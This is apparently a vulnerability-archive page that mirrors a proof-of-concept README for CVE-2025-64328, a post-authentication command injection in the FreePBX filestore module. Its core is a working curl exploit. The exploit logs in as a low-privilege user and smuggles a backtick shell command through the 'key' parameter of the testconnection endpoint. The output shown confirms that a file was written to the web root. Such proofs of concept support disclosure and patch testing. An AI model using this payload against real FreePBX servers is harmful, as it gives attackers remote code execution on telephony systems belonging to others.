Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1325 CNY

100%
Buy Us a Coffee

CVE-2025-64328 PoC — FreePBX Administration GUI is Vulnerable to Authenticated Command Injection

Source
https://github.com/mcorybillington/CVE-2025-64328_FreePBX-framework-Command-Injection
Associated Vulnerability
Title:FreePBX Administration GUI is Vulnerable to Authenticated Command Injection (CVE-2025-64328)
Description:FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. In versions 17.0.2.36 and above before 17.0.3, the filestore module within the Administrative interface is vulnerable to a post-authentication command injection by an authenticated known user via the testconnection -> check_ssh_connect() function. An attacker can leverage this vulnerability to obtain remote access to the system as an asterisk user. This issue is fixed in version 17.0.3.
Description
CVE-2025-64328 FreePBX Authenticated Command Injection in the framework module.
Readme
# CVE-2025-64328 FreePBX Authenticated Command Injection in `framework` module

Simple proof of concept repository for CVE-2025-64328 FreePBX Authenticated Command Injection in the `framework` module.

Full writeup here: https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/

## `curl` proof of concept
```
$ curl -s \
-XPOST --cookie-jar /tmp/freepbx-cookie --data 'username=lowprivuser&password=<lowprivuserpassword>' http://192.168.122.206/admin/config.php -o /dev/null \
--next \
--cookie /tmp/freepbx-cookie -H 'Referer: http://192.168.122.206' 'http://192.168.122.206/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=asdf&port=22&key=asdf`echo%20rcetest2>/var/www/html/rcetest.txt`&path=test' | jq
{
  "status": true,
  "message": "Login failed"
}

$ curl -sk http://192.168.122.206/rcetest.txt
rcetest2
```
## Nuclei template:

[CVE-2025-64328.yaml](./CVE-2025-64328.yaml)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →